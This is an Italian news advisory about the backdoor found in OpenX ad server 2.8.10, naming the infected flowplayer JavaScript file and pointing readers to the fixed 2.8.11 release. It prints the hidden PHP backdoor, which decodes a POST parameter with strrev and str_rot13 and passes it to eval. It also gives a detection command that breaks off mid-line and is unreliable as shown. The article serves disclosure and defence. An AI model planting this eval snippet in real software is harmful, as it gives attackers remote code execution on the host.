OpenX è stato infettato con una backdoor. Non si tratta di una compromissione recente, già dal novembre 2012 infatti i sorgenti dell'ad server open source più usato al mondo sono stati infettati da una backdoor che consentiva l'upload di una shell, un "canale" in grado di fornire a un attaccante il controllo completo del gestionale banner. La scoperta è stata fatta dal magazine Heise Security e resa nota dal SANS (in lingua inglese) che ha individuato una backdoor nel file "/plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js".
this.each(function(){l=flashembed(this,k,j)}
Nel file JavaScript è stato incluso codice PHP che permette l'esecuzione di codice attraverso la funzione eval:
<?php
$j=’explode’;
$_=$j(",",’strrev,str_rot13,vastPlayer’);
eval ( $_[1]($_[0]( $_POST[$_[2]])) );
Heise consiglia di eseguire la seguente ricerca (valida su Linux o sistemi Unix-like) per individuare la presenza della backdoor nella propria installazione di OpenX:
find. -name \*.js -exec grep -l '
Se utilizzate OpenX per la gestione dei banner è consigliabile un controllo approfondito.
Aggiornamento 8 agosto 2013OpenX ha rilasciato una nuova versione che è esente da backdoor: OpenX 2.8.11. Chi utilizza la versione infetta, cioè la 2.8.10 possono seguire i consigli dati dagli sviluppatori del software.